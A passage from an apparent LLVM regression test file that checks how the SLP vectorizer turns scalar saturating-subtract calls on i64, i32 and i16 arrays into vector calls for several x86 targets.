; SLM-NEXT:    [[R0:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A0]], i64 [[B0]])
; SLM-NEXT:    [[R1:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A1]], i64 [[B1]])
; SLM-NEXT:    [[R2:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A2]], i64 [[B2]])
; SLM-NEXT:    [[R3:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A3]], i64 [[B3]])
; SLM-NEXT:    [[R4:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A4]], i64 [[B4]])
; SLM-NEXT:    [[R5:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A5]], i64 [[B5]])
; SLM-NEXT:    [[R6:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A6]], i64 [[B6]])
; SLM-NEXT:    [[R7:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A7]], i64 [[B7]])
; SLM-NEXT:    store i64 [[R0]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
; SLM-NEXT:    store i64 [[R1]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
; SLM-NEXT:    store i64 [[R2]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
; SLM-NEXT:    store i64 [[R3]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
; SLM-NEXT:    store i64 [[R4]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
; SLM-NEXT:    store i64 [[R5]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
; SLM-NEXT:    store i64 [[R6]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
; SLM-NEXT:    store i64 [[R7]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
; SLM-NEXT:    ret void
;
; AVX1-LABEL: @sub_v8i64(
; AVX1-NEXT:    [[TMP1:%.*]] = load <2 x i64>, <2 x i64>* bitcast ([8 x i64]* @a64 to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP2:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP3:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP4:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP5:%.*]] = load <2 x i64>, <2 x i64>* bitcast ([8 x i64]* @b64 to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP6:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP7:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP8:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT:    [[TMP9:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP1]], <2 x i64> [[TMP5]])
; AVX1-NEXT:    [[TMP10:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP2]], <2 x i64> [[TMP6]])
; AVX1-NEXT:    [[TMP11:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP3]], <2 x i64> [[TMP7]])
; AVX1-NEXT:    [[TMP12:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP4]], <2 x i64> [[TMP8]])
; AVX1-NEXT:    store <2 x i64> [[TMP9]], <2 x i64>* bitcast ([8 x i64]* @c64 to <2 x i64>*), align 8
; AVX1-NEXT:    store <2 x i64> [[TMP10]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT:    store <2 x i64> [[TMP11]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT:    store <2 x i64> [[TMP12]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT:    ret void
;
; AVX2-LABEL: @sub_v8i64(
; AVX2-NEXT:    [[TMP1:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @a64 to <4 x i64>*), align 8
; AVX2-NEXT:    [[TMP2:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT:    [[TMP3:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @b64 to <4 x i64>*), align 8
; AVX2-NEXT:    [[TMP4:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT:    [[TMP5:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP1]], <4 x i64> [[TMP3]])
; AVX2-NEXT:    [[TMP6:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP2]], <4 x i64> [[TMP4]])
; AVX2-NEXT:    store <4 x i64> [[TMP5]], <4 x i64>* bitcast ([8 x i64]* @c64 to <4 x i64>*), align 8
; AVX2-NEXT:    store <4 x i64> [[TMP6]], <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT:    ret void
;
; AVX512-LABEL: @sub_v8i64(
; AVX512-NEXT:    [[TMP1:%.*]] = load <8 x i64>, <8 x i64>* bitcast ([8 x i64]* @a64 to <8 x i64>*), align 8
; AVX512-NEXT:    [[TMP2:%.*]] = load <8 x i64>, <8 x i64>* bitcast ([8 x i64]* @b64 to <8 x i64>*), align 8
; AVX512-NEXT:    [[TMP3:%.*]] = call <8 x i64> @llvm.ssub.sat.v8i64(<8 x i64> [[TMP1]], <8 x i64> [[TMP2]])
; AVX512-NEXT:    store <8 x i64> [[TMP3]], <8 x i64>* bitcast ([8 x i64]* @c64 to <8 x i64>*), align 8
; AVX512-NEXT:    ret void
;
; AVX256BW-LABEL: @sub_v8i64(
; AVX256BW-NEXT:    [[TMP1:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @a64 to <4 x i64>*), align 8
; AVX256BW-NEXT:    [[TMP2:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT:    [[TMP3:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @b64 to <4 x i64>*), align 8
; AVX256BW-NEXT:    [[TMP4:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT:    [[TMP5:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP1]], <4 x i64> [[TMP3]])
; AVX256BW-NEXT:    [[TMP6:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP2]], <4 x i64> [[TMP4]])
; AVX256BW-NEXT:    store <4 x i64> [[TMP5]], <4 x i64>* bitcast ([8 x i64]* @c64 to <4 x i64>*), align 8
; AVX256BW-NEXT:    store <4 x i64> [[TMP6]], <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT:    ret void
;
; Reference scalar IR that the RUN lines feed to the SLP vectorizer:
; c64[i] = ssub.sat(a64[i], b64[i]) for i = 0..7.
  %a0 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
  %a1 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
  %a2 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
  %a3 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
  %a4 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
  %a5 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
  %a6 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
  %a7 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
  %b0 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
  %b1 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
  %b2 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
  %b3 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
  %b4 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
  %b5 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
  %b6 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
  %b7 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
  %r0 = call i64 @llvm.ssub.sat.i64(i64 %a0, i64 %b0)
  %r1 = call i64 @llvm.ssub.sat.i64(i64 %a1, i64 %b1)
  %r2 = call i64 @llvm.ssub.sat.i64(i64 %a2, i64 %b2)
  %r3 = call i64 @llvm.ssub.sat.i64(i64 %a3, i64 %b3)
  %r4 = call i64 @llvm.ssub.sat.i64(i64 %a4, i64 %b4)
  %r5 = call i64 @llvm.ssub.sat.i64(i64 %a5, i64 %b5)
  %r6 = call i64 @llvm.ssub.sat.i64(i64 %a6, i64 %b6)
  %r7 = call i64 @llvm.ssub.sat.i64(i64 %a7, i64 %b7)
  store i64 %r0, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
  store i64 %r1, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
  store i64 %r2, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
  store i64 %r3, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
  store i64 %r4, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
  store i64 %r5, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
  store i64 %r6, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
  store i64 %r7, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
  ret void
}
; 16 x i32 saturating subtract (@llvm.ssub.sat.i32) over @a32/@b32 into @c32.
; Expected SLP shapes per target: SSE/SLM use four <4 x i32> calls, AVX two
; <8 x i32>, AVX512 a single <16 x i32>.  The IR body must stay byte-identical
; to what utils/update_test_checks.py generated from.
define void @sub_v16i32() {
; SSE-LABEL: @sub_v16i32(
; SSE-NEXT:    [[TMP1:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @a32 to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP2:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP3:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP4:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP5:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @b32 to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP6:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP7:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP8:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT:    [[TMP9:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP1]], <4 x i32> [[TMP5]])
; SSE-NEXT:    [[TMP10:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP2]], <4 x i32> [[TMP6]])
; SSE-NEXT:    [[TMP11:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP3]], <4 x i32> [[TMP7]])
; SSE-NEXT:    [[TMP12:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP4]], <4 x i32> [[TMP8]])
; SSE-NEXT:    store <4 x i32> [[TMP9]], <4 x i32>* bitcast ([16 x i32]* @c32 to <4 x i32>*), align 4
; SSE-NEXT:    store <4 x i32> [[TMP10]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT:    store <4 x i32> [[TMP11]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT:    store <4 x i32> [[TMP12]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT:    ret void
;
; SLM-LABEL: @sub_v16i32(
; SLM-NEXT:    [[TMP1:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @a32 to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP2:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP3:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP4:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP5:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @b32 to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP6:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP7:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP8:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT:    [[TMP9:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP1]], <4 x i32> [[TMP5]])
; SLM-NEXT:    [[TMP10:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP2]], <4 x i32> [[TMP6]])
; SLM-NEXT:    [[TMP11:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP3]], <4 x i32> [[TMP7]])
; SLM-NEXT:    [[TMP12:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP4]], <4 x i32> [[TMP8]])
; SLM-NEXT:    store <4 x i32> [[TMP9]], <4 x i32>* bitcast ([16 x i32]* @c32 to <4 x i32>*), align 4
; SLM-NEXT:    store <4 x i32> [[TMP10]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT:    store <4 x i32> [[TMP11]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT:    store <4 x i32> [[TMP12]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT:    ret void
;
; AVX-LABEL: @sub_v16i32(
; AVX-NEXT:    [[TMP1:%.*]] = load <8 x i32>, <8 x i32>* bitcast ([16 x i32]* @a32 to <8 x i32>*), align 4
; AVX-NEXT:    [[TMP2:%.*]] = load <8 x i32>, <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT:    [[TMP3:%.*]] = load <8 x i32>, <8 x i32>* bitcast ([16 x i32]* @b32 to <8 x i32>*), align 4
; AVX-NEXT:    [[TMP4:%.*]] = load <8 x i32>, <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT:    [[TMP5:%.*]] = call <8 x i32> @llvm.ssub.sat.v8i32(<8 x i32> [[TMP1]], <8 x i32> [[TMP3]])
; AVX-NEXT:    [[TMP6:%.*]] = call <8 x i32> @llvm.ssub.sat.v8i32(<8 x i32> [[TMP2]], <8 x i32> [[TMP4]])
; AVX-NEXT:    store <8 x i32> [[TMP5]], <8 x i32>* bitcast ([16 x i32]* @c32 to <8 x i32>*), align 4
; AVX-NEXT:    store <8 x i32> [[TMP6]], <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT:    ret void
;
; AVX512-LABEL: @sub_v16i32(
; AVX512-NEXT:    [[TMP1:%.*]] = load <16 x i32>, <16 x i32>* bitcast ([16 x i32]* @a32 to <16 x i32>*), align 4
; AVX512-NEXT:    [[TMP2:%.*]] = load <16 x i32>, <16 x i32>* bitcast ([16 x i32]* @b32 to <16 x i32>*), align 4
; AVX512-NEXT:    [[TMP3:%.*]] = call <16 x i32> @llvm.ssub.sat.v16i32(<16 x i32> [[TMP1]], <16 x i32> [[TMP2]])
; AVX512-NEXT:    store <16 x i32> [[TMP3]], <16 x i32>* bitcast ([16 x i32]* @c32 to <16 x i32>*), align 4
; AVX512-NEXT:    ret void
;
; Reference scalar IR that the RUN lines feed to the SLP vectorizer:
; c32[i] = ssub.sat(a32[i], b32[i]) for i = 0..15.
  %a0  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 0 ), align 4
  %a1  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 1 ), align 4
  %a2  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 2 ), align 4
  %a3  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 3 ), align 4
  %a4  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4 ), align 4
  %a5  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 5 ), align 4
  %a6  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 6 ), align 4
  %a7  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 7 ), align 4
  %a8  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8 ), align 4
  %a9  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 9 ), align 4
  %a10 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 10), align 4
  %a11 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 11), align 4
  %a12 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12), align 4
  %a13 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 13), align 4
  %a14 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 14), align 4
  %a15 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 15), align 4
  %b0  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 0 ), align 4
  %b1  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 1 ), align 4
  %b2  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 2 ), align 4
  %b3  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 3 ), align 4
  %b4  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4 ), align 4
  %b5  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 5 ), align 4
  %b6  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 6 ), align 4
  %b7  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 7 ), align 4
  %b8  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8 ), align 4
  %b9  = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 9 ), align 4
  %b10 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 10), align 4
  %b11 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 11), align 4
  %b12 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12), align 4
  %b13 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 13), align 4
  %b14 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 14), align 4
  %b15 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 15), align 4
  %r0  = call i32 @llvm.ssub.sat.i32(i32 %a0 , i32 %b0 )
  %r1  = call i32 @llvm.ssub.sat.i32(i32 %a1 , i32 %b1 )
  %r2  = call i32 @llvm.ssub.sat.i32(i32 %a2 , i32 %b2 )
  %r3  = call i32 @llvm.ssub.sat.i32(i32 %a3 , i32 %b3 )
  %r4  = call i32 @llvm.ssub.sat.i32(i32 %a4 , i32 %b4 )
  %r5  = call i32 @llvm.ssub.sat.i32(i32 %a5 , i32 %b5 )
  %r6  = call i32 @llvm.ssub.sat.i32(i32 %a6 , i32 %b6 )
  %r7  = call i32 @llvm.ssub.sat.i32(i32 %a7 , i32 %b7 )
  %r8  = call i32 @llvm.ssub.sat.i32(i32 %a8 , i32 %b8 )
  %r9  = call i32 @llvm.ssub.sat.i32(i32 %a9 , i32 %b9 )
  %r10 = call i32 @llvm.ssub.sat.i32(i32 %a10, i32 %b10)
  %r11 = call i32 @llvm.ssub.sat.i32(i32 %a11, i32 %b11)
  %r12 = call i32 @llvm.ssub.sat.i32(i32 %a12, i32 %b12)
  %r13 = call i32 @llvm.ssub.sat.i32(i32 %a13, i32 %b13)
  %r14 = call i32 @llvm.ssub.sat.i32(i32 %a14, i32 %b14)
  %r15 = call i32 @llvm.ssub.sat.i32(i32 %a15, i32 %b15)
  store i32 %r0 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 0 ), align 4
  store i32 %r1 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 1 ), align 4
  store i32 %r2 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 2 ), align 4
  store i32 %r3 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 3 ), align 4
  store i32 %r4 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4 ), align 4
  store i32 %r5 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 5 ), align 4
  store i32 %r6 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 6 ), align 4
  store i32 %r7 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 7 ), align 4
  store i32 %r8 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8 ), align 4
  store i32 %r9 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 9 ), align 4
  store i32 %r10, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 10), align 4
  store i32 %r11, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 11), align 4
  store i32 %r12, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12), align 4
  store i32 %r13, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 13), align 4
  store i32 %r14, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 14), align 4
  store i32 %r15, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 15), align 4
  ret void
}
define void @sub_v32i16() {
; SSE-LABEL: @sub_v32i16(
; SSE-NEXT: [[TMP1:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @a16 to <8 x i16>*), align 2
; SSE-NEXT: [[TMP2:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP3:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP4:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP5:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @b16 to <8 x i16>*), align 2
; SSE-NEXT: [[TMP6:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP7:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP8:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP9:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP1]], <8 x i16> [[TMP5]])
; SSE-NEXT: [[TMP10:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP2]], <8 x i16> [[TMP6]])
; SSE-NEXT: [[TMP11:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP3]], <8 x i16> [[TMP7]])
; SSE-NEXT: [[TMP12:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP4]], <8 x i16> [[TMP8]])
; SSE-NEXT: store <8 x i16> [[TMP9]], <8 x i16>* bitcast ([32 x i16]* @c16 to <8 x i16>*), align 2
; SSE-NEXT: store <8 x i16> [[TMP10]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: store <8 x i16> [[TMP11]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <8 x i16>*), align 2
